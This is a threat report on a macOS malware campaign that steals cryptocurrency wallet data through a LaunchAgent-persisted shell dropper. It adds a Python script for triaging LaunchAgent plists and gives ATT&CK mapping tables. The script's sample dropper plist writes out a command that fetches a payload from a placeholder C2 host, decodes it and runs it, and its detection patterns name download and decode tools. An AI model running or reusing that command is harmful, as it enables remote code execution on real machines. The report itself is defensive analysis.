EXECUTIVE SUMMARY:
This report describes a stealthy, modular macOS malware campaign built around a multi-stage shell script that acts as the initial dropper. The script retrieves additional encoded components from a remote command server, decodes them, and executes them on the victim system. Persistence is established through a LaunchAgent entry, so the malicious process is restarted automatically whenever the user logs in. The campaign is designed to quietly infiltrate environments where cryptocurrency use is common, with an emphasis on stealing wallet data, seed phrases, and system information. Rather than ending with a one-off lure, the threat involves structured post-execution activity, long-term persistence, and targeted data collection. Its design points to a financially motivated group seeking durable access and repeated opportunities for exfiltration.
Once executed, the initial script creates a hidden working directory within the user's home folder and begins a continuous retrieval cycle, pulling base64-encoded modules from its command server. Each module is decoded and run in sequence, which lets the threat actor update capabilities remotely without redeploying the dropper. Persistence depends on a LaunchAgent plist that reinitializes the orchestrator at every login. The downloaded modules are tailored for crypto-related theft: they extract wallet files, monitor directories associated with multiple wallet platforms, and replace legitimate wallet applications with tampered clones built to capture seed phrases. Additional modules gather device telemetry, installed-software inventories, and process lists, giving the operator situational awareness of the host. The communication patterns show obfuscation measures intended to evade both behavioral detection and static analysis.
Overall, the campaign is a highly targeted, financially driven malware operation designed to persist within macOS environments. The modular architecture lets the attackers push new functionality, maintain long-term access, and adapt to defender countermeasures. The focus on cryptocurrency wallet harvesting, combined with application-replacement techniques and continuous system monitoring, signals an effort to maximize financial gain with minimal visibility. Its persistence strategy, multi-stage delivery model, and tailored exfiltration workflows point to a threat actor with technical discipline and a clear operational objective. Defenders should prioritize detection of unusual LaunchAgent entries (in particular those that launch a shell interpreter with an inline command, reference a hidden directory under the user's home, or decode base64 content at login), integrity monitoring of wallet applications, and restrictions on arbitrary script execution to mitigate the risk posed by this type of campaign.
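The LaunchAgent triage below is an added example and is not code from the original report or from the campaign itself. It parses LaunchAgent property lists with the Python standard library and scores each one against the indicators the summary describes: an interpreter launched with an inline command, a hidden directory under the user's home, base64 decoding or download tooling in the command line, and RunAtLoad/KeepAlive settings that keep the orchestrator alive across logins. The indicator names, the equal weighting, the sample plists and the label strings are assumptions constructed for illustration.

```python
"""Triage macOS LaunchAgent plists for a login-persistence pattern in which a
shell orchestrator in a hidden home directory decodes base64 stages at login.

Added example, not code from the report or the campaign. Standard library only.
Indicator names, weighting, sample plists and labels are constructed here.
"""
import plistlib
import re
import tempfile
from pathlib import Path

# Interpreters that are a weak signal alone but strong with an inline command;
# compared against the basename of the launched program.
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript", "perl"}

# Decode-and-run or download tooling inside a login item's command line.
SUSPICIOUS_RE = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b|\bcurl\s|\bwget\s|\beval\s|\bnohup\s"
)

# A path into a dot-directory directly under the user's home (~/.x, $HOME/.x,
# /Users/name/.x), searched anywhere in the command line.
HIDDEN_HOME_RE = re.compile(r'(?:^|[\s"\'=])(?:/Users/[^/\s]+|~|\$HOME)/\.[^/\s]')


def triage_plist(data: bytes) -> dict:
    """Score one LaunchAgent plist (XML or binary bytes) and list its indicators."""
    plist = plistlib.loads(data)
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    if "Program" in plist:  # launchd runs Program when set; treat it as the executable
        args = [str(plist["Program"])] + args
    cmdline = " ".join(args)
    findings = []
    if args and Path(args[0]).name in INTERPRETERS:
        findings.append("interpreter-launched")
    if SUSPICIOUS_RE.search(cmdline):
        findings.append("decode-or-download-in-cmdline")
    if HIDDEN_HOME_RE.search(cmdline):
        findings.append("hidden-home-dir")
    if plist.get("RunAtLoad"):
        findings.append("run-at-load")
    keep_alive = plist.get("KeepAlive")
    if keep_alive is True or isinstance(keep_alive, dict):
        findings.append("keep-alive")
    return {
        "label": str(plist.get("Label", "<no label>")),
        "cmdline": cmdline,
        "findings": findings,
        "score": len(findings),
    }


def scan_directory(directory) -> list:
    """Triage every *.plist in one LaunchAgents directory, highest score first."""
    results = []
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            result = triage_plist(path.read_bytes())
        except Exception as exc:  # unparseable plists deserve a look too
            result = {"label": path.name, "cmdline": "", "score": 1,
                      "findings": [f"unparseable: {type(exc).__name__}"]}
        result["path"] = str(path)
        results.append(result)
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed samples (not real IOCs): a vendor-style updater and a dropper-style agent.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
    "RunAtLoad": True,
})
DROPPER_PLIST = plistlib.dumps({
    "Label": "com.example.sysupd",
    "ProgramArguments": ["/bin/sh", "-c",
                         "cd ~/.sysupd && curl -s http://c2.example/stage | base64 -d | sh"],
    "RunAtLoad": True,
    "KeepAlive": True,
})


def demo() -> list:
    """Write both samples into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "com.example.updater.plist").write_bytes(BENIGN_PLIST)
        Path(tmp, "com.example.sysupd.plist").write_bytes(DROPPER_PLIST)
        return scan_directory(tmp)


if __name__ == "__main__":
    # On a real host, point scan_directory at ~/Library/LaunchAgents and
    # /Library/LaunchAgents instead of the constructed samples.
    for r in demo():
        print(f"{r['score']}  {r['label']:<24} {', '.join(r['findings'])}")
```

Run it against ~/Library/LaunchAgents and /Library/LaunchAgents on the host under investigation. A single hit such as run-at-load or hidden-home-dir is common for legitimate software, so treat the score as a triage ordering rather than a verdict, and confirm candidates with a code-signature check on the launched binary (codesign --verify) and with the wallet-application integrity monitoring the summary recommends.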
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
|---|---|---|---|
| Execution | T1059.006 | Command & Scripting Interpreter | Python |
| Persistence | T1543.001 | Create or Modify System Process | Launch Agent |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | — |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | — |
| | T1027 | Obfuscated Files or Information | — |
| Discovery | T1082 | System Information Discovery | — |
| | T1057 | Process Discovery | — |
| | T1518.001 | Software Discovery | Security Software Discovery |
| Collection | T1005 | Data from Local System | — |
| | T1119 | Automated Collection | — |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Command & Control | T1105 | Ingress Tool Transfer | — |
| | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
| | T1567.002 | Exfiltration Over Web Services | Exfiltration to Cloud Storage |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
|---|---|---|
| Execution | E1204 | User Execution |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Collection | F0002 | Keylogging |
| | E1113 | Screen Capture |
REFERENCES:
The following reports contain further technical details: